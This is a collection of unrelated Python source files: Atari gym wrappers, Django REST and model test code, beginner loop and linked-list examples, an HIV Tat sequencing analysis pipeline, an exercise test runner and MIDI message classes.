def __init__(self, env=None, skip=4):
"""Return only every `skip`-th frame"""
super(MaxAndSkipEnv, self).__init__(env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = collections.deque(maxlen=2)
self._skip = skip
def step(self, action):
total_reward = 0.0
done = None
for _ in range(self._skip):
obs, reward, done, info = self.env.step(action)
self._obs_buffer.append(obs)
total_reward += reward
if done:
break
max_frame = np.max(np.stack(self._obs_buffer), axis=0)
return max_frame, total_reward, done, info
def reset(self):
"""Clear past frame buffer and init. to first obs. from inner env."""
self._obs_buffer.clear()
obs = self.env.reset()
self._obs_buffer.append(obs)
return obs
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condtion for a few frames
# so its important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class FireResetEnv(gym.Wrapper):
def __init__(self, env=None):
"""For environments where the user needs to press FIRE for the game to start."""
super(FireResetEnv, self).__init__(env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def step(self, action):
return self.env.step(action)
def reset(self):
self.env.reset()
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset()
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset()
return obs
class ProcessFrame(gym.ObservationWrapper):
def __init__(self, env=None):
super(ProcessFrame, self).__init__(env)
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1), dtype=np.uint8)
def observation(self, obs):
return ProcessFrame.process(obs)
@staticmethod
def process(frame):
img = np.reshape(frame, frame.shape).astype(np.float32)
img = img[:, :, 0] * 0.299 + img[:, :, 1] * 0.587 + img[:, :, 2] * 0.114
resized_screen = cv2.resize(img, (84, 110), interpolation=cv2.INTER_AREA)
x_t = resized_screen[18:102, :]
x_t = np.reshape(x_t, [84, 84, 1])
return x_t.astype(np.uint8)
class BufferWrapper(gym.ObservationWrapper):
def __init__(self, env, n_steps, dtype=np.float32):
super(BufferWrapper, self).__init__(env)
self.dtype = dtype
old_space = env.observation_space
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(*old_space.shape[:-1], old_space.shape[-1]*n_steps), dtype=dtype)
def reset(self):
self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)
return self.observation(self.env.reset())
def observation(self, observation):
self.buffer[:, :, :-1] = self.buffer[:, :, 1:]
self.buffer[:, :, -1] = observation[:, :, 0]
return self.buffer
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, obs):
return np.array(obs).astype(np.float32) / 255.0
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class ParallelEnvWrapper(object):
def __init__(self, env_fn, env_id, num_envs):
self.num_envs = num_envs
self.envs = [env_fn(env_id, training=True) for i in range(self.num_envs)]
self.obs = [env.reset() for env in self.envs]
self.reward = [0 for i in range(self.num_envs)]
self.action_space = self.envs[0].action_space
self.observation_space = self.envs[0].observation_space
self.loop = asyncio.get_event_loop()
def step(self, actions):
results = [self.loop.run_until_complete(self._step(i, actions[i])) for i in range(self.num_envs)]
self.obs, r, d, info = zip(*results)
return self.obs, r, d, info
async def _step(self, i, action):
o, r, d, info = self.envs[i].step(action)
self.reward[i] += r
if d == True:
o = self.envs[i].reset()
info['episode'] = { 'total_reward': self.reward[i] }
self.reward[i] = 0
return o, r, d, info
def make_atari(env_id, training=True):
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
if training: env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if training: env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = ProcessFrame(env)
env = BufferWrapper(env, 4)
env = ScaledFloatFrame(env)
if training: env = ClipRewardEnv(env)
return env
def make_gym(env_id, training=True):
env = gym.make(env_id)
# if training: env = ClipRewardEnv(env)
return env
|
from rest_framework import routers, viewsets, serializers
from daphne import models as m
class PageSerializer(serializers.ModelSerializer):
class Meta:
model = m.Page
class TestViewSet(viewsets.ModelViewSet):
queryset = m.Page.objects.all()
serializer_class = PageSerializer
router = routers.DefaultRouter()
router.register(r'^users', TestViewSet)
|
def solution(s):
answer = []
for string in s.lower().split(' '):
answer.append(string.capitalize())
return " ".join(answer) |
from django.test import TestCase
from datetime import datetime, date
from django.utils.timezone import make_aware
from ..models import Company, RawPrices
class CompanyModelTests(TestCase):
def test_is_empty(self):
"""初期状態では何も登録されていないことをチェック"""
saved_companys = Company.objects.all()
self.assertEqual(saved_companys.count(), 0)
def test_is_count_one(self):
"""1つレコードを適当に作成すると、レコードが1つだけカウントされることをテスト"""
company = Company(code=1, name='test_text')
company.save()
saved_companys = Company.objects.all()
self.assertEqual(saved_companys.count(), 1)
def test_saving_and_retrieving_company(self):
"""内容を指定してデータを保存し、すぐに取り出した時に保存した時と同じ値が返されることをテスト"""
company = Company()
code = 2
name = 'test_text2'
company.code = code
company.name = name
company.save()
saved_companys = Company.objects.all()
actual_company = saved_companys[0]
self.assertEqual(actual_company.code, code)
self.assertEqual(actual_company.name, name)
class RawPricesModelTests(TestCase):
def test_is_empty(self):
"""初期状態では何も登録されていないことをチェック"""
saved_raw_prices = RawPrices.objects.all()
self.assertEqual(saved_raw_prices.count(), 0)
def test_is_count_one(self):
"""1つレコードを適当に作成すると、レコードが1つだけカウントされることをテスト"""
raw_prices = RawPrices(code=1, date=date.today(), datetime=make_aware(datetime.now()), open_price=1,
close_price=2, high_price=3, low_price=1,
volume=100, adjustment_close_price=2, moving_averages25=0.0, moving_averages75=0.0)
raw_prices.save()
saved_raw_prices = RawPrices.objects.all()
self.assertEqual(saved_raw_prices.count(), 1)
def test_saving_and_retrieving_raw_prices(self):
"""内容を指定してデータを保存し、すぐに取り出した時に保存した時と同じ値が返されることをテスト"""
raw_prices = RawPrices()
code = 2
dated = date.today()
datetimed = make_aware(datetime.now())
open_price = 2
close_price = 6
high_price = 10
low_price = 1
volume = 1000
adjustment_close_price = 6
moving_averages25 = 1.0
moving_averages75 = 2.0
raw_prices.code = code
raw_prices.date = dated
raw_prices.datetime = datetimed
raw_prices.open_price = open_price
raw_prices.close_price = close_price
raw_prices.high_price = high_price
raw_prices.low_price = low_price
raw_prices.volume = volume
raw_prices.adjustment_close_price = adjustment_close_price
raw_prices.moving_averages25 = moving_averages25
raw_prices.moving_averages75 = moving_averages75
raw_prices.save()
saved_raw_prices = RawPrices.objects.all()
actual_raw_prices = saved_raw_prices[0]
self.assertEqual(actual_raw_prices.code, code)
self.assertEqual(actual_raw_prices.date, dated)
self.assertEqual(actual_raw_prices.datetime, datetimed)
self.assertEqual(actual_raw_prices.open_price, open_price)
self.assertEqual(actual_raw_prices.close_price, close_price)
self.assertEqual(actual_raw_prices.high_price, high_price)
self.assertEqual(actual_raw_prices.low_price, low_price)
self.assertEqual(actual_raw_prices.volume, volume)
self.assertEqual(actual_raw_prices.adjustment_close_price, adjustment_close_price)
self.assertEqual(actual_raw_prices.moving_averages25, moving_averages25)
self.assertEqual(actual_raw_prices.moving_averages75, moving_averages75)
|
# break 強制結束迴圈
# while 布林值:
# break
# 程式範例
# n=1
# while n<5:
# if n==3:
# break
# n+=1
# print(n) # 印出 3
# for 變數名稱 in 列表/字串:
# break
# continue 強制繼續下一圈
# while 布林值:
# continue
# for 變數名稱 in 列表/字串:
# continue
# 程式範例
# n=0
# for x in [0,1,2,3]: # x 會跑 4 圈, 分別為 0, 1, 2, 3
# if x%2==0: # 若餘數=0, 強制下一圈
# continue # x=0, 因餘數為0, 所以強制下一圈, 執行 x=1,
# n+=1 # x=1, 餘數不為0, n+=1 => n=1, 執行 x=2,
# print(n) # 印出 2 # x=2, 因餘數為0, 所以強制下一圈, 執行 x=3,
# # x=3, 餘數不為0, n+=1 => n=2, print(n) => 2
# else
# 基本語法
# while 布林值:
# 若布林值為 True, 執行命令
# 回到上方, 做下次的迴圈判定
# else:
# 迴圈結束前, 執行此區塊的命令 # while 跑完後執行
# 程式範例
# n=1
# while n<5:
# print("變數 n 的資料是:", n)
# n+=1
# else:
# print(n) # 結束迴圈前, 印出 5
# 執行結果
# 變數 n 的資料是: 1
# 變數 n 的資料是: 2
# 變數 n 的資料是: 3
# 變數 n 的資料是: 4
# 5
# 基本語法
# for 變數名稱 in 列表/字串
# 將列表中的項目或字串中的字元逐一取出, 逐一處理
# else:
# 迴圈結束前, 執行此區塊的指令 # while 跑完後執行
# 程式範例
# for c in "Hello":
# print("逐一取得字串中的字元", c)
# else:
# print(c) # 結束迴圈前, 印出 o
# 執行結果
# 逐一取得字串中的字元 H
# 逐一取得字串中的字元 e
# 逐一取得字串中的字元 l
# 逐一取得字串中的字元 l
# 逐一取得字串中的字元 o
# o
# break 的簡易範例
# n=0
# while n<5:
# if n==3:
# break
# print(n) # 印出迴圈中的 n
# n+=1
# print("最後的 n: ", n) # 印出迴圈結束後的 n
# 執行結果
# 0
# 1
# 2
# 最後的 n: 3
# continue 的簡易範例
n=0
# for x in [0,1,2,3]:
# if x%2==0:
# continue
# print(x)
# n+=1
# print("最後的 n: ", n)
# 執行結果
# 1
# 3
# 最後的 n: 2
# else 的簡易範例
# sum=0
# for n in range(11):
# sum+=n
# else:
# print(sum) # 印出 0+1+2+...+10 的結果 # 印出 55
# 綜合範例: 找出整數平方根
# 輸入 9, 得到 3
# 輸入 11, 得到【沒有】整數的平方根
# n=input("輸入一個正整數: ")
# n=int(n) # 轉換輸入成數字
# for i in range(n): # i 從 0 ~ n-1
# if i*i==n:
# print("整數平方根", i)
# break # 用break 強制結束迴圈時, 不會執行 else 區塊
# else:
# print("沒有整數平方根")
|
# !/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author:梨花菜
# @File: 链表.py
# @Time : 2020/3/28 20:29
# @Email: lihuacai168@gmail.com
# @Software: PyCharm
class Node:
def __init__(self, data_val):
self.data_val = data_val
self.next_val = None
class LinkedList:
def __init__(self):
self.head_val = None
def list_print(self):
print_val = self.head_val
while print_val is not None:
print(print_val.data_val)
print_val = print_val.next_val
def at_begin(self, new_data):
new_node = Node(new_data)
new_node.next_val = self.head_val
self.head_val = new_node
def at_end(self, new_data):
new_node = Node(new_data)
# 列表为空,最后一个即最后一个
if self.head_val is None:
self.head_val = new_node
return
# 遍历链表,当节点没有下一个节点时,就是最后一个节点
laste = self.head_val
while(laste.next_val):
laste = laste.next_val
laste.next_val = new_node
def in_between(self, middle_node, new_data):
if middle_node is None:
print("找不到节点")
return
new_node = Node(new_data)
# 新节点在原来节点的后面插入,那么新节点的下一个节点就是原来节点的下一个节点
# 原来节点的下一个节点就是新节点
new_node.next_val = middle_node.next_val
middle_node.next_val = new_node
def remove_node(self, remove_key):
head_val = self.head_val
# 当remove_key是头节点
if head_val is not None:
if head_val.data_val == remove_key:
self.head_val = head_val.next_val
# 清空头节点
head_val = None
return
# 遍历所有节点,找到对应的remove_key就退出循环
while head_val is not None:
if head_val.data_val == remove_key:
break
prev = head_val
head_val = head_val.next_val
# 当循环中没找到remove_key,那么
if head_val is None:
return
# head_val.data_val等于时remove_key
# a > b > c ,删除b时,把b的下一个节点c,当成是a的下一个节点
prev.next_val = head_val.next_val
# 清空remove_key对应的节点
head_val = None
list1 = LinkedList()
list1.head_val = Node("Mon")
e2 = Node("Tue")
e3 = Node("Wed")
list1.head_val.next_val = e2
e2.next_val = e3
list1.at_begin("Sun")
list1.at_end("Fri")
list1.in_between(list1.head_val.next_val, "Thu")
list1.remove_node("Mon")
list1.list_print()
|
#!/usr/bin/env python
'''
This file defines functions for NGS Tat analysis pipeline
'''
from __future__ import division
import pandas as pd
import numpy as np
from collections import Counter
import itertools
from scipy import interp
from sklearn import metrics
from sklearn.linear_model import LogisticRegression
from sklearn.cross_validation import StratifiedKFold
from sklearn.cross_validation import cross_val_score
from sklearn.preprocessing import scale
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rc('font',family='Arial')
##################################################################
def plot_histogram(DF, feature, xlabel, savepath):
"""Plots a histogram of GDS scores"""
fig,ax = plt.subplots(figsize=(6,4))
ax.hist(DF[feature])
ax.set_xlabel(xlabel, size=16, fontweight='bold')
ax.set_ylabel('Number of Samples', size=16, fontweight='bold')
ax.set_axis_bgcolor('white')
ax.spines['left'].set_visible(True)
ax.spines['left'].set_color('black')
ax.spines['left'].set_linewidth(2)
ax.spines['bottom'].set_visible(True)
ax.spines['bottom'].set_color('black')
ax.spines['bottom'].set_linewidth(2)
ax.axvline(x=0.5, ymin=0, ymax = 30, linewidth=2, color='k', ls='--')
ax.tick_params(axis='x', labelsize=14)
ax.tick_params(axis='y', labelsize=14, length=5)
ax.yaxis.tick_left()
plt.show()
fig.tight_layout()
fig.savefig(savepath,dpi=300)
def split_df_by_impairment(DF, gds_score):
"""creates two dataframes based on a GDS threshold"""
GDS_mask = DF.GDS >= gds_score
impaired_df = DF[GDS_mask]
nonimpaired_df = DF[~GDS_mask]
return impaired_df, nonimpaired_df
def plot_clinical_boxplots(DF, impaired_df, nonimpaired_df, savepath):
"""creats boxplots of typical clinical parameters"""
fig,ax = plt.subplots(2,3,figsize=(12,6))
clin_cols = ['CD4','log10_VL','CD8','nCD4','log10_pVL','nCD8']
plot_titles = ['CD4 count','Log10(Viral Load)','CD8 count',
'nadir CD4','log10(peak VL)','nadir CD8']
x,y,t = 0,0,0
for feature in DF[clin_cols]:
impaired_list = list(impaired_df[feature])
nonimpaired_list = list(nonimpaired_df[feature])
ax[x,y].tick_params(axis='x', labelsize=14)
ax[x,y].tick_params(axis='y', labelsize=14, length=5)
ax[x,y].yaxis.tick_left()
ax[x,y].set_title(plot_titles[t], size=18)
ax[x,y].set_xticklabels('')
ax[x,y].boxplot([impaired_list, nonimpaired_list])
# formatting
ax[x,y].spines['left'].set_visible(True)
ax[x,y].spines['left'].set_color('black')
ax[x,y].spines['left'].set_linewidth(2)
ax[x,y].spines['bottom'].set_visible(True)
ax[x,y].spines['bottom'].set_color('black')
ax[x,y].spines['bottom'].set_linewidth(2)
ax[x,y].set_axis_bgcolor('white')
t += 1
if x==1:
ax[x,y].set_xticklabels(['Impaired', 'Nonimpaired'], size=16)
else:
ax[x,y].set_xticklabels(['', ''])
#update x and y coordinates
if y!=2:
y+=1
else:
y=0
x+=1
ax[0,1].set_ylabel('cells')
plt.show()
fig.tight_layout()
fig.savefig(savepath, dpi=300)
####################################################################
def select_dataframe_columns(df, columns):
'''Keeps only the relevant columns of the imported dataframe'''
return df[columns]
def shuffle_dataframe(df):
'''Shuffles the rows of the dataframe while preserving shape'''
return df.sample(frac=1)
def target_feature_split(df, target, features):
'''Splits target variable from model features'''
feature_df = df[features]
target = np.ravel(df[target])
return target, feature_df
def scale_dataframe(df):
'''Scales a dataframe containing float feature types'''
scaled_array = scale(df)
scaled_df = pd.DataFrame(scaled_array)
scaled_df.columns = df.columns
return scaled_df
def threshold_target(target, threshold):
'''Converts a continuous target variable into a categorical variable'''
return np.ravel([int(i>=threshold) for i in target])
def run_preparation_pipeline(df, features, target, threshold):
'''executes pipeline of functions'''
target, feature_df = target_feature_split(df, 'GDS', features)
feature_df = pd.get_dummies(feature_df, drop_first=True)
scaled_feature_df = scale_dataframe(feature_df)
target2 = threshold_target(target, 0.5)
X_df = scaled_feature_df
y = target2
return X_df, y
def run_preparation_pipeline2(df, features, target, threshold):
'''executes pipeline of functions'''
target, feature_df = target_feature_split(df, 'GDS', features)
feature_df = pd.get_dummies(feature_df, drop_first=True)
target2 = threshold_target(target, 0.5)
X_df = feature_df
y = target2
return X_df, y
def run_genetic_preparation_pipeline(df, features, target, threshold):
'''executes pipeline of functions'''
target, feature_df = target_feature_split(df, 'GDS', features)
feature_df = pd.get_dummies(feature_df, drop_first=True)
target2 = threshold_target(target, 0.5)
X_df = feature_df
y = target2
return X_df, y
####################################################################
def get_covariate_matrix(DF, features, target, threshold, savepath):
label_dict = {'CD4':'CD4 count', 'Age':'Age','log10_VL':'log10 VL',
'Gender_Male':'Gender','nCD8':'nadir CD8','CD8':'CD8 count',
'nCD4':'nadir CD4', 'log10_pVL':'log10 peak VL'}
X, y = run_preparation_pipeline(DF, features, target, threshold)
X.columns = [label_dict[c] for c in X.columns if c in list(label_dict.keys())]
plt.figure(figsize=(6, 6))
sns.set(font_scale=1.5)
sns.heatmap(X.corr(), square=True)
plt.tight_layout()
plt.savefig(savepath, dpi=300)
plt.show()
##################################################################
def threshold_converter(old_df, new_df, column, threshold):
t = old_df[column] > threshold
new_df[column] = t.astype(int)
return new_df
def make_threshold_dataframe(genetic_df, threshold):
threshold_df = pd.DataFrame()
for column in genetic_df.columns[1:]:
threshold_df = threshold_converter(genetic_df, threshold_df, column, threshold)
threshold_df['GDS'] = genetic_df['GDS']
order = ['GDS'] + list(genetic_df.columns[1:])
return threshold_df[order]
def get_consensus_df(g_df):
all_max = []
for i in range(1, g_df.shape[1], 20):
pos_idx = range(i,i+20,1)
pos_list = list(g_df.columns[pos_idx])
pos_df = g_df[pos_list]
all_max.append(list(pos_df.idxmax(axis=1)))
consensus_dict = {}
for L in all_max:
p = L[0][:-1]
consensus_dict[p] = []
for variant in L:
consensus_dict[p].append(variant[-1])
df_new = pd.DataFrame(consensus_dict)
df_new['GDS'] = g_df['GDS']
sorted_cols = ['GDS'] + [str(i+1) for i in range(101)]
return df_new[sorted_cols]
def get_pI_df(con_df):
aa_pi_dict = {'A':6.00,'R':10.76,'N':5.41,'D':2.77,'C':5.07,'E':3.22,
'Q':5.65,'G':5.97,'H':7.59,'I':6.02,'L':5.98,'K':9.74,
'M':5.74,'F':5.48,'P':6.30,'S':5.68,'T':5.60,'W':5.89,
'Y':5.66,'V':5.96}
pI_df = con_df.replace(to_replace=aa_pi_dict)
return pI_df
##################################################################
def get_CV_metrics(model, X, y, folds):
'''Cross-Validation with many metrics'''
roc_aucs, precisions, recalls, f1s = [], [], [], []
FPRs, TPRs = [], []
mean_tpr = 0.0
mean_fpr = np.linspace(0, 1, 100)
coefs = []
# 5-fold cross-validation
kf = StratifiedKFold(y, n_folds=folds)
for train_index, test_index in kf:
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = y[train_index], y[test_index]
mod_prediction = model.fit(X_train, Y_train).predict(X_test)
mod_probability = model.fit(X_train, Y_train).predict_proba(X_test)
# metrics
fpr, tpr, thresholds = metrics.roc_curve(Y_test, mod_probability[:, 1])
roc_auc = metrics.roc_auc_score(Y_test, mod_probability[:,1])
precision = metrics.precision_score(Y_test, mod_prediction)
recall = metrics.recall_score(Y_test, mod_prediction)
f1 = metrics.f1_score(Y_test, mod_prediction)
coef = model.coef_
# append fold metrics
FPRs.append(fpr)
TPRs.append(tpr)
roc_aucs.append(round(roc_auc,2))
precisions.append(round(precision,2))
recalls.append(round(recall,2))
f1s.append(round(f1,2))
coefs.append(coef)
#coefs.append(coef[0])
# mean calculations
mean_tpr += interp(mean_fpr, fpr, tpr)
mean_tpr[0] = 0.0
mean_tpr /= folds
mean_tpr[-1] = 1.0
mean_auc = metrics.auc(mean_fpr, mean_tpr)
d = {'AUC':roc_aucs, 'Precision':precisions, 'Recall':recalls, 'F1':f1s, 'Coef':coefs,
'FPRs':FPRs, 'TPRs':TPRs, 'meanTPR':mean_tpr, 'meanFPR':mean_fpr}
return d
def get_RF_CV_metrics(model, X, y, folds):
'''Cross-Validation with many metrics'''
roc_aucs, precisions, recalls, f1s = [], [], [], []
FPRs, TPRs = [], []
mean_tpr = 0.0
mean_fpr = np.linspace(0, 1, 100)
# 5-fold cross-validation
kf = StratifiedKFold(y, n_folds=folds)
for train_index, test_index in kf:
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = y[train_index], y[test_index]
mod_prediction = model.fit(X_train, Y_train).predict(X_test)
mod_probability = model.fit(X_train, Y_train).predict_proba(X_test)
# metrics
fpr, tpr, thresholds = metrics.roc_curve(Y_test, mod_probability[:, 1])
roc_auc = metrics.roc_auc_score(Y_test, mod_probability[:,1])
precision = metrics.precision_score(Y_test, mod_prediction)
recall = metrics.recall_score(Y_test, mod_prediction)
f1 = metrics.f1_score(Y_test, mod_prediction)
# append fold metrics
FPRs.append(fpr)
TPRs.append(tpr)
roc_aucs.append(round(roc_auc,2))
precisions.append(round(precision,2))
recalls.append(round(recall,2))
f1s.append(round(f1,2))
#coefs.append(coef[0])
# mean calculations
mean_tpr += interp(mean_fpr, fpr, tpr)
mean_tpr[0] = 0.0
mean_tpr /= folds
mean_tpr[-1] = 1.0
mean_auc = metrics.auc(mean_fpr, mean_tpr)
d = {'AUC':roc_aucs, 'Precision':precisions, 'Recall':recalls, 'F1':f1s,
'FPRs':FPRs, 'TPRs':TPRs, 'meanTPR':mean_tpr, 'meanFPR':mean_fpr}
return d
def metrics_wrapper(df, model, f, folds):
target = 'GDS'
threshold = 0.5
features = ['Age','Gender','log10_VL','log10_pVL','CD4','nCD4','CD8','nCD8','TMHDS']
df_shuffled = shuffle_dataframe(df)
X_df, y = run_preparation_pipeline(df_shuffled, features, target, threshold)
d = get_CV_metrics(model, X_df[f], y, folds)
return d
def metrics_wrapper_random(df, model, f, folds):
target = 'GDS'
threshold = 0.5
features = ['Age','Gender','log10_VL','log10_pVL','CD4','nCD4','CD8','nCD8','TMHDS']
df_shuffled = shuffle_dataframe(df)
X_df, y = run_preparation_pipeline(df_shuffled, features, target, threshold)
y_rand = np.random.permutation(y)
d = get_CV_metrics(model, X_df[f], y_rand, folds)
return d
####################################################################
def filter_genetic_variants(genetic_df, a, b):
keep_cols = ['GDS']
for col in genetic_df.columns[1:]:
s = sum(genetic_df[col] > a)
L = len(genetic_df[col])
passed = (s/L) > b
if passed:
#print (col, round(s/L,2))
keep_cols.append(col)
bad_cols = genetic_df.columns[1:61]
keep_cols = [x for x in keep_cols if x not in bad_cols]
return genetic_df[keep_cols]
|
#!/usr/bin/env python3
"""Meant to be run from inside python-test-runner container,
where this track repo is mounted at /python
"""
import argparse
from functools import wraps
from itertools import zip_longest
import json
from pathlib import Path
import shutil
import subprocess
import sys
import tempfile
from typing import List
from data import Config, ExerciseConfig, ExerciseInfo, ExerciseStatus
# Allow high-performance tests to be skipped
ALLOW_SKIP = ['alphametics', 'largest-series-product']
TEST_RUNNER_DIR = Path('/opt/test-runner')
RUNNERS = {}
def runner(name):
def _decorator(runner_func):
RUNNERS[name] = runner_func
@wraps(runner_func)
def _wrapper(exercise: ExerciseInfo, workdir: Path, quiet: bool = False):
return runner_func(exercise, workdir, quiet=quiet)
return _wrapper
return _decorator
def copy_file(src: Path, dst: Path, strip_skips=False):
if strip_skips:
with src.open('r') as src_file:
lines = [line for line in src_file.readlines()
if not line.strip().startswith('@unittest.skip')]
with dst.open('w') as dst_file:
dst_file.writelines(lines)
else:
shutil.copy2(src, dst)
def copy_solution_files(exercise: ExerciseInfo, workdir: Path, exercise_config: ExerciseConfig = None):
if exercise_config is not None:
solution_files = exercise_config.files.solution
exemplar_files = exercise_config.files.exemplar
helper_files = exercise_config.files.editor
else:
solution_files = []
exemplar_files = []
helper_files = []
if helper_files:
helper_files = [exercise.path / h for h in helper_files]
for helper_file in helper_files:
dst = workdir / helper_file.relative_to(exercise.path)
copy_file(helper_file, dst)
if not solution_files:
solution_files.append(exercise.solution_stub.name)
solution_files = [exercise.path / s for s in solution_files]
if not exemplar_files:
exemplar_files.append(exercise.exemplar_file.relative_to(exercise.path))
exemplar_files = [exercise.path / e for e in exemplar_files]
for solution_file, exemplar_file in zip_longest(solution_files, exemplar_files):
if solution_file is None:
copy_file(exemplar_file, workdir / exemplar_file.name)
elif exemplar_file is None:
copy_file(solution_file, workdir / solution_file.name)
else:
dst = workdir / solution_file.relative_to(exercise.path)
copy_file(exemplar_file, dst)
def copy_test_files(exercise: ExerciseInfo, workdir: Path, exercise_config = None):
if exercise_config is not None:
test_files = exercise_config.files.test
helper_files = exercise_config.files.editor
else:
test_files = []
helper_files = []
if helper_files:
for helper_file_name in helper_files:
helper_file = exercise.path / helper_file_name
helper_file_out = workdir / helper_file_name
copy_file(helper_file, helper_file_out, strip_skips=(exercise.slug not in ALLOW_SKIP))
if not test_files:
test_files.append(exercise.test_file.name)
for test_file_name in test_files:
test_file = exercise.path / test_file_name
test_file_out = workdir / test_file_name
copy_file(test_file, test_file_out, strip_skips=(exercise.slug not in ALLOW_SKIP))
def copy_exercise_files(exercise: ExerciseInfo, workdir: Path):
exercise_config = None
if exercise.config_file.is_file():
workdir_meta = workdir / '.meta'
workdir_meta.mkdir(exist_ok=True)
copy_file(exercise.config_file, workdir_meta / exercise.config_file.name)
exercise_config = exercise.load_config()
copy_solution_files(exercise, workdir, exercise_config)
copy_test_files(exercise, workdir, exercise_config)
@runner('pytest')
def run_with_pytest(_exercise, workdir, quiet: bool = False) -> int:
kwargs = {'cwd': str(workdir)}
if quiet:
kwargs['stdout'] = subprocess.DEVNULL
kwargs['stderr'] = subprocess.DEVNULL
return subprocess.run([sys.executable, '-m', 'pytest'], **kwargs).returncode
@runner('test-runner')
def run_with_test_runner(exercise, workdir, quiet: bool = False) -> int:
kwargs = {}
if quiet:
kwargs['stdout'] = subprocess.DEVNULL
kwargs['stderr'] = subprocess.DEVNULL
if TEST_RUNNER_DIR.is_dir():
kwargs['cwd'] = str(TEST_RUNNER_DIR)
args = ['./bin/run.sh', exercise.slug, workdir, workdir]
else:
args = [
'docker-compose',
'run',
'-w', str(TEST_RUNNER_DIR),
'--entrypoint', './bin/run.sh',
'-v', f'{workdir}:/{exercise.slug}',
'test-runner',
exercise.slug,
f'/{exercise.slug}',
f'/{exercise.slug}',
]
subprocess.run(args, **kwargs)
results_file = workdir / 'results.json'
if results_file.is_file():
with results_file.open() as f:
results = json.load(f)
if results['status'] == 'pass':
return 0
return 1
def check_assignment(exercise: ExerciseInfo, runner: str = 'pytest', quiet: bool = False) -> int:
ret = 1
with tempfile.TemporaryDirectory(exercise.slug) as workdir:
workdir = Path(workdir)
copy_exercise_files(exercise, workdir)
ret = RUNNERS[runner](exercise, workdir, quiet=quiet)
return ret
def get_cli() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser()
runners = list(RUNNERS.keys())
if not runners:
print('No runners registered!')
raise SystemExit(1)
parser.add_argument('-q', '--quiet', action='store_true')
parser.add_argument('--deprecated', action='store_true', help='include deprecated exercises', dest='include_deprecated')
parser.add_argument('--wip', action='store_true', help='include WIP exercises', dest='include_wip')
parser.add_argument('-r', '--runner', choices=runners, default=runners[0])
parser.add_argument('exercises', nargs='*')
return parser
def main():
opts = get_cli().parse_args()
config = Config.load()
status_filter = {ExerciseStatus.Active, ExerciseStatus.Beta}
if opts.include_deprecated:
status_filter.add(ExerciseStatus.Deprecated)
if opts.include_wip:
status_filter.add(ExerciseStatus.WIP)
exercises = config.exercises.all(status_filter)
if opts.exercises:
# test specific exercises
exercises = [
e for e in exercises if e.slug in opts.exercises
]
not_found = [
slug for slug in opts.exercises
if not any(e.slug == slug for e in exercises)
]
if not_found:
for slug in not_found:
if slug not in exercises:
print(f"unknown or disabled exercise '{slug}'")
raise SystemExit(1)
print(f'TestEnvironment: {sys.executable.capitalize()}')
print(f'Runner: {opts.runner}\n\n')
failures = []
for exercise in exercises:
print('# ', exercise.slug)
if not exercise.test_file:
print('FAIL: File with test cases not found')
failures.append('{} (FileNotFound)'.format(exercise.slug))
else:
if check_assignment(exercise, runner=opts.runner, quiet=opts.quiet):
failures.append('{} (TestFailed)'.format(exercise.slug))
print('')
if failures:
print('FAILURES: ', ', '.join(failures))
raise SystemExit(1)
else:
print('SUCCESS!')
if __name__ == "__main__":
main()
|
import mido
class Msg:
def __init__(self, T=0, c=0, n=0, v=0):
self.track = T
self.channel = c
self.note = n
self.velocity = v
class Msgs:
def __init__(self):
self.msgs = []
def append(self, newMsg):
self.msgs.append(newMsg)
def hasMsgDown(self, channel, note, beside=None):
for msg in self.msgs:
if msg.channel == channel and msg.note == note and msg.velocity > 0 and msg != beside:
return True
return False
class MsgListItem:
def __init__(self):
self.tick = 0
self.msgs = Msgs()
class MsgList:
def __init__(self):
# 最终要保存的信息表 msgList
self.msgList = []
def findByTick(self, tick):
for item in self.msgList:
if item.tick == tick:
return item
# 查无此项
newItem = MsgListItem()
newItem.tick = tick
self.msgList.append(newItem)
return newItem
def fixForShortNote(self, item):
for msg in item.msgs.msgs:
if msg.velocity == 0 and item.msgs.hasMsgDown(channel=msg.channel, note=msg.note):
tick = item.tick + 1
self.findByTick(tick).msgs.append(msg)
item.msgs.msgs.remove(msg)
def fixForOverLapNote(self, item):
for msg in item.msgs.msgs:
if msg.velocity == 0 and item.msgs.hasMsgDown(channel=msg.channel, note=msg.note):
tick = item.tick - 1
self.findByTick(tick).msgs.append(msg)
